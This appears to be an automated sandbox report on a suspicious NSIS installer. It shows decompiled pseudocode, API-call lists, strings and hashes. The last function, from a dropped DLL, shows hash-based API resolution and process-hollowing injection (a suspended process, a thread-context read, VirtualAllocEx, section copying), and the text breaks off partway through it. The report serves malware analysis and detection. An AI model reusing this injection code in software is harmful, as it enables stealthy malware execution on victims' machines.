                                                                                            0x00402df7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402dfc
                                                                                            0x00402dff
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ce3
                                                                                            0x00402ce8
                                                                                            0x00402ce8
                                                                                            0x00402ced
                                                                                            0x00402cf1
                                                                                            0x00402cf8
                                                                                            0x00402cfd
                                                                                            0x00402cff
                                                                                            0x00402d01
                                                                                            0x00402d01
                                                                                            0x00402d05
                                                                                            0x00402d0a
                                                                                            0x00402d0c
                                                                                            0x00402e36
                                                                                            0x00402e2d
                                                                                            0x00000000
                                                                                            0x00402e2d
                                                                                            0x00402d12
                                                                                            0x00402d19
                                                                                            0x00402d95
                                                                                            0x00402d99
                                                                                            0x00402d9d
                                                                                            0x00402da2
                                                                                            0x00000000
                                                                                            0x00402d99
                                                                                            0x00402d22
                                                                                            0x00402d27
                                                                                            0x00402d2a
                                                                                            0x00402d2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d31
                                                                                            0x00402d38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d3a
                                                                                            0x00402d41
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d43
                                                                                            0x00402d4a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d4c
                                                                                            0x00402d53
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d55
                                                                                            0x00402d5b
                                                                                            0x00402d64
                                                                                            0x00402d6a
                                                                                            0x00402d6d
                                                                                            0x00402d6f
                                                                                            0x00402d75
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402d7b
                                                                                            0x00402d7f
                                                                                            0x00402d87
                                                                                            0x00402d87
                                                                                            0x00402d8a
                                                                                            0x00402d8d
                                                                                            0x00402d8f
                                                                                            0x00402d91
                                                                                            0x00402d91
                                                                                            0x00000000
                                                                                            0x00402d8f
                                                                                            0x00402d81
                                                                                            0x00402d85
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402da3
                                                                                            0x00402da3
                                                                                            0x00402da9
                                                                                            0x00402db5
                                                                                            0x00402db5
                                                                                            0x00402db8
                                                                                            0x00402dbe
                                                                                            0x00402dc0
                                                                                            0x00402dc0
                                                                                            0x00402dc8
                                                                                            0x00402dc8
                                                                                            0x00000000
                                                                                            0x00402dc8

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402C66
                                                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\MV ROCKET_PDA.exe,00000400), ref: 00402C82
                                                                                              • Part of subcall function 0040589E: GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\Desktop\MV ROCKET_PDA.exe,80000000,00000003), ref: 004058A2
                                                                                              • Part of subcall function 0040589E: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
                                                                                            • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MV ROCKET_PDA.exe,C:\Users\user\Desktop\MV ROCKET_PDA.exe,80000000,00000003), ref: 00402CCE
                                                                                            Strings
                                                                                            • "C:\Users\user\Desktop\MV ROCKET_PDA.exe" , xrefs: 00402C55
                                                                                            • C:\Users\user\Desktop, xrefs: 00402CB0, 00402CB5, 00402CBB
                                                                                            • Inst, xrefs: 00402D3A
                                                                                            • C:\Users\user\Desktop\MV ROCKET_PDA.exe, xrefs: 00402C6C, 00402C7B, 00402C8F, 00402CAF
                                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
                                                                                            • soft, xrefs: 00402D43
                                                                                            • Null, xrefs: 00402D4C
                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00402C5F
                                                                                            • Error launching installer, xrefs: 00402CA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                            • String ID: "C:\Users\user\Desktop\MV ROCKET_PDA.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MV ROCKET_PDA.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                            • API String ID: 4283519449-2263083167
                                                                                            • Opcode ID: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                            • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
                                                                                            • Opcode Fuzzy Hash: d7843f665ea2917adf3dcfe78593387cec42cc0a537a0d0ef4c304b969a704fe
                                                                                            • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174fileCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 95%
                                                                                            			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ec78; // 0x9b57
					E004030E2(_t95 + _t65);
				}
				_t67 = E004030B0( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b088; // 0x41cc48
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b088; // 0x41cc48
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                                                                            0x00402e96
                                                                                            0x00402e9a
                                                                                            0x00402e9d
                                                                                            0x00402ea2
                                                                                            0x00402ea4
                                                                                            0x00402ea4
                                                                                            0x00402eab
                                                                                            0x00402eaf
                                                                                            0x00402eb4
                                                                                            0x00402eb6
                                                                                            0x00402eb6
                                                                                            0x00402ebd
                                                                                            0x00402ec2
                                                                                            0x00402ec4
                                                                                            0x00402ecd
                                                                                            0x00402ecd
                                                                                            0x00402ed8
                                                                                            0x00402edf
                                                                                            0x0040305b
                                                                                            0x0040305b
                                                                                            0x00000000
                                                                                            0x00402ee5
                                                                                            0x00402ee9
                                                                                            0x00403046
                                                                                            0x0040309b
                                                                                            0x00403060
                                                                                            0x00403066
                                                                                            0x00403068
                                                                                            0x00403068
                                                                                            0x00403079
                                                                                            0x00000000
                                                                                            0x0040307b
                                                                                            0x0040308e
                                                                                            0x00403040
                                                                                            0x00403040
                                                                                            0x0040305d
                                                                                            0x0040305d
                                                                                            0x00000000
                                                                                            0x00403095
                                                                                            0x00403095
                                                                                            0x00403098
                                                                                            0x00000000
                                                                                            0x00403098
                                                                                            0x0040308e
                                                                                            0x00403079
                                                                                            0x004030a6
                                                                                            0x00000000
                                                                                            0x004030a6
                                                                                            0x0040304b
                                                                                            0x0040304d
                                                                                            0x0040304d
                                                                                            0x00403059
                                                                                            0x004030a3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00403059
                                                                                            0x00402ef5
                                                                                            0x00402ef7
                                                                                            0x00402efe
                                                                                            0x00402f05
                                                                                            0x00402f05
                                                                                            0x00402f0c
                                                                                            0x00402f14
                                                                                            0x00402f1e
                                                                                            0x00402f23
                                                                                            0x00402f2b
                                                                                            0x00402f35
                                                                                            0x00402f38
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f3e
                                                                                            0x00402f3e
                                                                                            0x00402f3e
                                                                                            0x00402f46
                                                                                            0x00402f48
                                                                                            0x00402f48
                                                                                            0x00402f59
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f5f
                                                                                            0x00402f62
                                                                                            0x00402f68
                                                                                            0x00402f6e
                                                                                            0x00402f6e
                                                                                            0x00402f79
                                                                                            0x00402f7f
                                                                                            0x00402f84
                                                                                            0x00402f8b
                                                                                            0x00402f8e
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402f94
                                                                                            0x00402f9a
                                                                                            0x00402f9c
                                                                                            0x00402fa5
                                                                                            0x00402fa7
                                                                                            0x00402fd5
                                                                                            0x00402fdb
                                                                                            0x00402fe4
                                                                                            0x00402fe9
                                                                                            0x00402fe9
                                                                                            0x00402ff0
                                                                                            0x00403034
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00402ff2
                                                                                            0x00402ff5
                                                                                            0x00403017
                                                                                            0x0040301c
                                                                                            0x0040301f
                                                                                            0x00403022
                                                                                            0x00403025
                                                                                            0x00403029
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040302f
                                                                                            0x00403003
                                                                                            0x0040300b
                                                                                            0x00000000
                                                                                            0x00403012
                                                                                            0x00403012
                                                                                            0x00000000
                                                                                            0x00403012
                                                                                            0x0040300b
                                                                                            0x00402ff0
                                                                                            0x0040303c
                                                                                            0x00000000
                                                                                            0x0040303c
                                                                                            0x00000000
                                                                                            0x00402f3e

                                                                                            APIs
                                                                                            • GetTickCount.KERNEL32 ref: 00402EF5
                                                                                            • GetTickCount.KERNEL32 ref: 00402F9C
                                                                                            • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FC5
                                                                                            • wsprintfA.USER32 ref: 00402FD5
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,0041CC48,7FFFFFFF,00000000), ref: 00403003
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: CountTick$FileWritewsprintf
                                                                                            • String ID: ... %d%%$HLA$HLA
                                                                                            • API String ID: 4209647438-295942573
                                                                                            • Opcode ID: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                            • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
                                                                                            • Opcode Fuzzy Hash: 2ed182f22c19ccbe5ebd44aa976ae303b5dd6c485202a0ec0c370d738780273e
                                                                                            • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401751, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 73%
                                                                                            			E00401751(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A29(0x31);
				 *(_t85 - 0xc) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
				_t33 = E00405727(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E004056BA(E00405BC7(0x409c40, "C:\\Users\\hardz\\AppData\\Local\\Temp")), ??);
				} else {
					_push(0x409c40);
					E00405BC7();
				}
				E00405E29(0x409c40);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405EC2(0x409c40);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E0040587F(0x409c40);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E0040589E(0x409c40, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 8) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EB3(0xffffffe2,  *(_t85 - 0xc));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42eca8;
						goto L32;
					} else {
						E00405BC7(0x40a440, 0x42f000);
						E00405BC7(0x42f000, 0x409c40);
						E00405BE9(_t75, 0x40a440, 0x409c40, "C:\Users\hardz\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll",  *((intOrPtr*)(_t85 - 0x14)));
						E00405BC7(0x42f000, 0x40a440);
						_t62 = E00405488("C:\Users\hardz\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll",  *(_t85 - 0x28) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42eca8 =  &( *0x42eca8->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409c40);
								_push(0xfffffffa);
								E00404EB3();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EB3(0xffffffea,  *(_t85 - 0xc));
				 *0x42ecd4 =  *0x42ecd4 + 1;
				_t43 = E00402E8E( *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 8), _t75, _t75); // executed
				 *0x42ecd4 =  *0x42ecd4 - 1;
				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x1c) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 8), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 8)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffee);
					} else {
						E00405BE9(_t75, _t80, 0x409c40, 0x409c40, 0xffffffe9);
						lstrcatA(0x409c40,  *(_t85 - 0xc));
					}
					_push(0x200010);
					_push(0x409c40);
					E00405488();
					goto L29;
				}
				goto L33;
			}
















                                                                                            0x00401751
                                                                                            0x00401758
                                                                                            0x00401761
                                                                                            0x00401764
                                                                                            0x00401767
                                                                                            0x0040176c
                                                                                            0x00401774
                                                                                            0x00401790
                                                                                            0x00401776
                                                                                            0x00401776
                                                                                            0x00401777
                                                                                            0x00401777
                                                                                            0x00401796
                                                                                            0x004017a0
                                                                                            0x004017a0
                                                                                            0x004017a4
                                                                                            0x004017a7
                                                                                            0x004017ac
                                                                                            0x004017ae
                                                                                            0x004017b0
                                                                                            0x004017b5
                                                                                            0x004017b5
                                                                                            0x004017c0
                                                                                            0x004017c0
                                                                                            0x004017d1
                                                                                            0x004017d3
                                                                                            0x004017d3
                                                                                            0x004017d4
                                                                                            0x004017d4
                                                                                            0x004017d7
                                                                                            0x004017da
                                                                                            0x004017dd
                                                                                            0x004017dd
                                                                                            0x004017e4
                                                                                            0x004017f3
                                                                                            0x004017f8
                                                                                            0x004017fb
                                                                                            0x004017fe
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00401800
                                                                                            0x00401803
                                                                                            0x0040185d
                                                                                            0x00401862
                                                                                            0x004015a8
                                                                                            0x0040268f
                                                                                            0x0040268f
                                                                                            0x004028be
                                                                                            0x004028c1
                                                                                            0x004028c1
                                                                                            0x00000000
                                                                                            0x00401805
                                                                                            0x0040180b
                                                                                            0x00401816
                                                                                            0x00401823
                                                                                            0x0040182e
                                                                                            0x00401844
                                                                                            0x00401844
                                                                                            0x00401847
                                                                                            0x00000000
                                                                                            0x0040184d
                                                                                            0x0040184d
                                                                                            0x0040184e
                                                                                            0x0040186b
                                                                                            0x004028c7
                                                                                            0x004028c7
                                                                                            0x004028c7
                                                                                            0x00401850
                                                                                            0x00401850
                                                                                            0x00401851
                                                                                            0x00401492
                                                                                            0x00402241
                                                                                            0x00402241
                                                                                            0x00402241
                                                                                            0x0040184e
                                                                                            0x00401847
                                                                                            0x004028c9
                                                                                            0x004028cd
                                                                                            0x004028cd
                                                                                            0x0040187b
                                                                                            0x00401880
                                                                                            0x0040188e
                                                                                            0x00401893
                                                                                            0x00401899
                                                                                            0x0040189d
                                                                                            0x0040189f
                                                                                            0x004018a7
                                                                                            0x004018b3
                                                                                            0x004018a1
                                                                                            0x004018a1
                                                                                            0x004018a5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004018a5
                                                                                            0x004018bc
                                                                                            0x004018c2
                                                                                            0x004018c4
                                                                                            0x00000000
                                                                                            0x004018ca
                                                                                            0x004018ca
                                                                                            0x004018cd
                                                                                            0x004018e5
                                                                                            0x004018cf
                                                                                            0x004018d2
                                                                                            0x004018db
                                                                                            0x004018db
                                                                                            0x004018ea
                                                                                            0x004018ef
                                                                                            0x0040223c
                                                                                            0x00000000
                                                                                            0x0040223c
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • lstrcatA.KERNEL32(00000000,00000000,gqeqcda,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401790
                                                                                            • CompareFileTime.KERNEL32(-00000014,?,gqeqcda,gqeqcda,00000000,00000000,gqeqcda,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017BA
                                                                                              • Part of subcall function 00405BC7: lstrcpynA.KERNEL32(?,?,00000400,004031D8,gqjlpjiaybpobgywdcz Setup,NSIS Error), ref: 00405BD4
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                                                                                              • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041CC48,74E5EA30,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                                                                                              • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041CC48,74E5EA30), ref: 00404F0F
                                                                                              • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F47
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F61
                                                                                              • Part of subcall function 00404EB3: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F6F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.277054308.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.277036376.0000000000400000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277080552.0000000000407000.00000002.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277090932.0000000000409000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277160620.0000000000420000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277173462.000000000042C000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277191166.0000000000434000.00000004.00020000.sdmp Download File
                                                                                            • Associated: 00000000.00000002.277207000.0000000000437000.00000002.00020000.sdmp Download File
                                                                                            Similarity
                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp$C:\Users\user\AppData\Local\Temp\nsk8EF9.tmp\lqnx.dll$gqeqcda
                                                                                            • API String ID: 1941528284-2951247092
                                                                                            • Opcode ID: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                            • Instruction ID: c8ecff54efbd1983964958a71a4b78ec9a68474d29a8073c081a3edbe3f43163
                                                                                            • Opcode Fuzzy Hash: 95e67b310e6745b10a35ef5b552587608c142c3317b69d328c6358dc637ee1da
                                                                                            • Instruction Fuzzy Hash: 8541B631904514BBCB107BA6CC45DAF3678EF01329F60823BF521F11E1D63CAA419EAE
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 72E46323, Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 237processthreadCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 31%
                                                                                            			E72E46323(char _a4) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				void* _v20;
				char* _v24;
				intOrPtr _v28;
				char* _v32;
				intOrPtr _v36;
				void _v40;
				intOrPtr _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				struct _STARTUPINFOW _v160;
				struct _CONTEXT _v876;
				short _v1916;
				void* _t155;
				void* _t161;
				intOrPtr _t162;
				void* _t165;
				signed int _t175;
				void* _t186;

				_v12 = E72E45837();
				_t2 =  &_v12; // 0x72e46145
				_v68 = E72E458E6( *_t2, 0xff7f721a);
				_t4 =  &_v12; // 0x72e46145
				_v76 = E72E458E6( *_t4, 0x7fe2736c);
				_t6 =  &_v12; // 0x72e46145
				_v80 = E72E458E6( *_t6, 0x7fa1f993);
				_t8 =  &_v12; // 0x72e46145
				_v84 = E72E458E6( *_t8, 0x7fa3ef6e);
				_t10 =  &_v12; // 0x72e46145
				_v92 = E72E458E6( *_t10, 0xff31bf16);
				_t12 =  &_v12; // 0x72e46145
				_v72 = E72E458E6( *_t12, 0x7fb6c905);
				_t228 = 0x7fb1f910;
				_t14 =  &_v12; // 0x72e46145
				_v88 = E72E458E6( *_t14, 0x7fb1f910);
				_t16 =  &_a4; // 0x72e46145
				_v64 =  *_t16;
				_t19 =  &_a4; // 0x72e46145
				_v8 =  *_t19 +  *((intOrPtr*)(_v64 + 0x3c));
				_t26 = ( *(_v8 + 0x14) & 0x0000ffff) + 0x18; // 0x18
				_v44 = _v8 + _t26;
				_v28 = 0x10;
				_v24 =  &_v60;
				while(_v28 != 0) {
					 *_v24 = 0;
					_v24 = _v24 + 1;
					_v28 = _v28 - 1;
				}
				_v36 = 0x44;
				_v32 =  &_v160;
				while(_v36 != 0) {
					 *_v32 = 0;
					_v32 = _v32 + 1;
					_v36 = _v36 - 1;
				}
				_v20 =  *(_v8 + 0x34);
				_push(0x103);
				_push( &_v1916);
				_push(0);
				if(_v68() != 0) {
					if(CreateProcessW( &_v1916, _v72(), 0, 0, 0, 0x8000004, 0, 0,  &_v160,  &_v60) != 0) {
						_v876.ContextFlags = 0x10007;
						if(GetThreadContext(_v60.hThread,  &_v876) != 0) {
							if(ReadProcessMemory(_v60.hProcess, _v876.Ebx + 8,  &_v40, 4, 0) != 0) {
								_t217 = _v40;
								if(_v40 <  *(_v8 + 0x34)) {
									L18:
									_v20 = VirtualAllocEx(_v60.hProcess,  *(_v8 + 0x34),  *(_v8 + 0x50), 0x3000, 0x40);
									if(_v20 != 0) {
										_push(0);
										_push( *((intOrPtr*)(_v8 + 0x54)));
										_t84 =  &_a4; // 0x72e46145
										_push( *_t84);
										_push(_v20);
										_push(_v60.hProcess);
										_t155 = E72E453D7(_t217, _t228); // executed
										if(_t155 != 0) {
											_v16 = _v16 & 0x00000000;
											while(_v16 < ( *(_v8 + 6) & 0x0000ffff)) {
												_push(0);
												_push( *((intOrPtr*)(_v44 + 0x10 + _v16 * 0x28)));
												_push(_a4 +  *((intOrPtr*)(_v44 + 0x14 + _v16 * 0x28)));
												_t175 = _v16 * 0x28;
												_t217 = _v44;
												_t228 = _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc));
												_push(_v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc)));
												_push(_v60.hProcess);
												E72E453D7(_t217, _v20 +  *((intOrPtr*)(_t217 + _t175 + 0xc))); // executed
												_v16 = _v16 + 1;
											}
											_push(0);
											_push(4);
											_push( &_v20);
											_push(_v876.Ebx + 8);
											_push(_v60.hProcess);
											_t161 = E72E453D7(_t217, _t228); // executed
											if(_t161 != 0) {
												_t162 = _v8;
												_t219 = _v20 +  *((intOrPtr*)(_t162 + 0x28));
												_v876.Eax = _v20 +  *((intOrPtr*)(_t162 + 0x28));
